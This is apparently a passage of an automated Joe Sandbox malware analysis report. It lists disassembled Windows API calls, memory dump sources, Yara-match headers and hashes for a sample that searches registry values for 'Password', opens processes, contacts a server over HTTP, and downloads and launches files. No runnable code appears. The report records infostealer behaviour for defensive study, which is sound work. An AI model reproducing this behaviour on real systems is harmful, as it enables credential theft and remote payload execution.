                                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00881E28,00000000,00000000,00400100,00000000), ref: 00406385
                                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                      • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                      • lstrlenA.KERNEL32(00000000), ref: 00415383
                                      • strtok.MSVCRT(00000000,?), ref: 0041539E
                                      • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3532888709-1526165396
                                      • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                      • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                      • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                      • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                      • StrCmpCA.SHLWAPI(?,00882630), ref: 00406147
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                      • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                      • InternetCloseHandle.WININET(a+A), ref: 00406253
                                      • InternetCloseHandle.WININET(00000000), ref: 00406260
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID: a+A$a+A
                                      • API String ID: 4287319946-2847607090
                                      • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                      • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                      • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                      • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • memset.MSVCRT ref: 02310E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 02310EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 02310ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 02310F01
                                      • lstrlen.KERNEL32(?), ref: 02310F0E
                                      • memset.MSVCRT ref: 02310F34
                                      • memset.MSVCRT ref: 02310F48
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02319927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02310DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02319948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02310FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02310FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction ID: 35522517d7eb90b59c97a0f8d1b3203d1006c9361fafea9de1f17707d8db9016
                                      • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                      • Instruction Fuzzy Hash: 388195B5941218ABCB2CEBA0DD91FED773AAF44305F404199A30A660C1EF746B88CF59
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • memset.MSVCRT ref: 02310E83
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310E9C
                                      • lstrcat.KERNEL32(?,00420D7C), ref: 02310EAE
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EC4
                                      • lstrcat.KERNEL32(?,00420D80), ref: 02310ED6
                                      • lstrcat.KERNEL32(?,00000000), ref: 02310EEF
                                      • lstrcat.KERNEL32(?,00420D84), ref: 02310F01
                                      • lstrlen.KERNEL32(?), ref: 02310F0E
                                      • memset.MSVCRT ref: 02310F34
                                      • memset.MSVCRT ref: 02310F48
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02319927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02310DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02319948
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02310FC1
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02310FCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                      • String ID:
                                      • API String ID: 1395395982-0
                                      • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction ID: 42f3598f976658086c349e589bc73ac3edb5ff9273cd19556ab1fc093f0eff73
                                      • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                      • Instruction Fuzzy Hash: B761B4B5501218ABCB2CEBA0DD95FED773AAF44305F404199E70A660C1EF746B88CF59
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02304B7C
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 02304BA1
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02304D21
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0230504F
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0230506B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0230507F
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023050B0
                                      • InternetCloseHandle.WININET(00000000), ref: 02305114
                                      • InternetCloseHandle.WININET(00000000), ref: 0230512C
                                      • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02304D7C
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • InternetCloseHandle.WININET(00000000), ref: 02305136
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID:
                                      • API String ID: 2402878923-0
                                      • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction ID: 9a3129397ed7561faf28734569129f4ea8a4a7272e8207a062f8084ca6bf87ab
                                      • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                      • Instruction Fuzzy Hash: 5C12B076911258ABCB2DEB90DD91FEEB77ABF15301F504199A10AB2090EF742F88CF51
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02306548
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 0230656A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0230659C
                                      • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 023065EC
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02306626
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02306638
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02306664
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 023066D4
                                      • InternetCloseHandle.WININET(00000000), ref: 02306756
                                      • InternetCloseHandle.WININET(00000000), ref: 02306760
                                      • InternetCloseHandle.WININET(00000000), ref: 0230676A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID:
                                      • API String ID: 3074848878-0
                                      • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction ID: 3faa9ca742e78e169a21579ca2e79550fd2c74944e007af0d1768bf2a4266fc3
                                      • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                      • Instruction Fuzzy Hash: 2C718C75A40218ABDB24DFE0CC99BEEB779FB44700F108199E10AAB1D4DBB46A84CF51
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 023192D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID:
                                      • API String ID: 2244384528-0
                                      • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction ID: 93d5801fea019961653deb4997089ad8260a1894146cf5cf16677cca6bf021e9
                                      • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                      • Instruction Fuzzy Hash: 1A71FCB9A50208ABDB18DFE4DC94FEEB7B9FF49700F108508F515A7290DB34A905CB61
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                      • memset.MSVCRT ref: 0041716A
                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                      Strings
                                      • sA, xrefs: 004172AE, 00417179, 0041717C
                                      • sA, xrefs: 00417111
                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenProcesslstrcpymemset
                                      • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                      • API String ID: 224852652-2614523144
                                      • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                      • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                      • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                      • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 023177A9
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 023177E6
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231786A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02317871
                                      • wsprintfA.USER32 ref: 023178A7
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\$B
                                      • API String ID: 1544550907-183544611
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 870a1a08491ab66902df90ca94465ab6c2af441709b30ab2239d20717ee685e8
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: 6E41A2B1D00258EBDB24DF94DC45BEEBBB9EF48700F140199E509A7280D7756A84CFA5
                                      APIs
                                        • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                        • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                        • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                        • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                        • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                        • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                      • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                      • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                      • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                      • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                      • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                      • task.LIBCPMTD ref: 004076FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                      • String ID: :
                                      • API String ID: 3191641157-3653984579
                                      • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                      • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                      • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                      • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                      APIs
                                      • lstrcpy.KERNEL32(?,?), ref: 02311642
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                        • Part of subcall function 023194C7: StrStrA.SHLWAPI(?,?), ref: 023194D3
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231167E
                                        • Part of subcall function 023194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 023194F7
                                        • Part of subcall function 023194C7: lstrlen.KERNEL32(?), ref: 0231950E
                                        • Part of subcall function 023194C7: wsprintfA.USER32 ref: 0231952E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 023116C6
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231170E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 02311755
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231179D
                                      • lstrcpy.KERNEL32(?,00000000), ref: 023117E5
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0231182C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 02311874
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                      • strtok_s.MSVCRT ref: 023119B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                      • String ID:
                                      • API String ID: 4276352425-0
                                      • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction ID: a56ff06699d52ae3279ffc9877df94914b5bbbbae634b3affa73dbde24a3de11
                                      • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                      • Instruction Fuzzy Hash: D27194B6951118ABCB28EBB0DC98FEE777AAF54301F0449D9E10DA3140EE759B84CF61
                                      APIs
                                      • memset.MSVCRT ref: 00407314
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                      • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                        • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                      • task.LIBCPMTD ref: 00407555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                      • String ID: Password
                                      • API String ID: 2698061284-3434357891
                                      • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                      • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                      • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                      APIs
                                      • lstrcatA.KERNEL32(?,008807A0,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
